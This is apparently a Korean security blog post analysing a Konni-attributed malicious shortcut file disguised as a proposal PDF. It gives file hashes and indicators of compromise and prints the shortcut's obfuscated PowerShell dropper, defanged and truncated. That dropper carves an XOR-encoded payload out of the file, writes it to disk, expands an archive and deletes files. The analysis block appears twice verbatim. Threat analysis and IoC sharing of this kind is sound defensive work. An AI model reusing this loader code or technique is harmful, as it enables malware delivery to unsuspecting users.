제안서로 위장을 하고 있는 북한 코니(Konni) 에서 만든 악성코드-제안서(2025.4.11)
Contents
오늘은 언제나 제안서로 위장하는 북한 코니(Konni) 에서 만든 악성코드에 대해 알아보겠습니다. 먼저 해쉬값은 다음과 같습니다.
파일명:제안서.pdf.lnk
사이즈:5 MB
MD5:777b6a02f7a44582c40ddadb82e60ddb
SHA-1:6af737ebc782825ebeb7dba389770a843811aff4
SHA-256:401f5a93a9496262fc83ea4cf557e4e9c15e4d2befacf475beba897986752d88
입니다. 일단 해시만 보고 개인적인 생각은 무엇인가 포함되어 있다는 것을 확인할 수가 있습니다.
일다 먼저 악성코드를 먼저 보아야 할 것입니다.
악성코드 내부
StringData
{
namestring: pdf File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\Window(s)Powershell\*(.)exe ^
| findstr /i rshell(.)exe') do (if e(x)ist "%f" (%f "func(t)ion sister{pa(r)am($title); <#
obv(i)ously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#
>return $mystery;};function tre(n)d{param($suppose);<#fully odds#> [System.IO.File]::Delete
($s(u)ppose);};function stir{param($league,$mirror,$wi(n)ner,$policy,$basket);<#sorr(y) lic
ense#> $knee=New-Object System.IO.FileStream(<#organi(z)ation psychological#>$league,<#fie
ld region#>[System.IO.FileMode]::Op(e)n,<#lots heavy#>[System.IO.FileAccess]::Read);<#grav
e rely#> $knee.Seek(<#pitch m(o)nitor#>$mirror,[(S)ystem.IO.SeekOrigin]::Begin);<#glass st
ruggle#> $observe=$winner*0x01;<#(c)ase full#> $model=New-Object byte[] <#those find#>$win
ner; <#highlight receive#> $smooth=New-Objec(t) byte[] <#also pl(a)yer#>$observe; <#expert
r(o)ugh#>$knee.Read(<#feeling an(y)where#>$smooth,0,<#abandon darkness#>$observe); $knee.C
lose();$fear=0;while($fear -l(t) $winner){<#motor e(x)ternal#>$model[$fear]=$smooth[$fear*
0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secu(r)e#> $model -En
(c)oding <#pl(a)tform spa(c)e#> Byte;};fun(c)tion room{param($a(c)quire, $mainly);<#str(e)
ngthen for(t)une#> exp(a)nd $acqui(r)e <#b(o)dy animal#> -F:* $mainly;};functio(n) would{$
(b)eauty = $env:pub(l)ic<#component slide#> + '\' +<#aud(i)ence attempt#> 'do'+'cum'(+)'en
'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence
gr(o)und#>$shot = Split-Pat(h) $regulation;<#extreme jury#> return $shot;};function resear
cher{return Get-Location;};functio(n) reality{<#variation choice#>return $env:Temp;};funct
ion suicide{$forth …
파일명:제안서.pdf.lnk
사이즈:5 MB
MD5:777b6a02f7a44582c40ddadb82e60ddb
SHA-1:6af737ebc782825ebeb7dba389770a843811aff4
SHA-256:401f5a93a9496262fc83ea4cf557e4e9c15e4d2befacf475beba897986752d88
입니다. 일단 해시만 보고 개인적인 생각은 무엇인가 포함되어 있다는 것을 확인할 수가 있습니다.
일다 먼저 악성코드를 먼저 보아야 할 것입니다.
악성코드 내부
StringData
{
namestring: pdf File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\Window(s)Powershell\*(.)exe ^
| findstr /i rshell(.)exe') do (if e(x)ist "%f" (%f "func(t)ion sister{pa(r)am($title); <#
obv(i)ously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#
>return $mystery;};function tre(n)d{param($suppose);<#fully odds#> [System.IO.File]::Delete
($s(u)ppose);};function stir{param($league,$mirror,$wi(n)ner,$policy,$basket);<#sorr(y) lic
ense#> $knee=New-Object System.IO.FileStream(<#organi(z)ation psychological#>$league,<#fie
ld region#>[System.IO.FileMode]::Op(e)n,<#lots heavy#>[System.IO.FileAccess]::Read);<#grav
e rely#> $knee.Seek(<#pitch m(o)nitor#>$mirror,[(S)ystem.IO.SeekOrigin]::Begin);<#glass st
ruggle#> $observe=$winner*0x01;<#(c)ase full#> $model=New-Object byte[] <#those find#>$win
ner; <#highlight receive#> $smooth=New-Objec(t) byte[] <#also pl(a)yer#>$observe; <#expert
r(o)ugh#>$knee.Read(<#feeling an(y)where#>$smooth,0,<#abandon darkness#>$observe); $knee.C
lose();$fear=0;while($fear -l(t) $winner){<#motor e(x)ternal#>$model[$fear]=$smooth[$fear*
0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secu(r)e#> $model -En
(c)oding <#pl(a)tform spa(c)e#> Byte;};fun(c)tion room{param($a(c)quire, $mainly);<#str(e)
ngthen for(t)une#> exp(a)nd $acqui(r)e <#b(o)dy animal#> -F:* $mainly;};functio(n) would{$
(b)eauty = $env:pub(l)ic<#component slide#> + '\' +<#aud(i)ence attempt#> 'do'+'cum'(+)'en
'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence
gr(o)und#>$shot = Split-Pat(h) $regulation;<#extreme jury#> return $shot;};function resear
cher{return Get-Location;};functio(n) reality{<#variation choice#>return $env:Temp;};funct
ion suicide{$forth …
IoC
6af737ebc782825ebeb7dba389770a843811aff4
401f5a93a9496262fc83ea4cf557e4e9c15e4d2befacf475beba897986752d88
777b6a02f7a44582c40ddadb82e60ddb
401f5a93a9496262fc83ea4cf557e4e9c15e4d2befacf475beba897986752d88
777b6a02f7a44582c40ddadb82e60ddb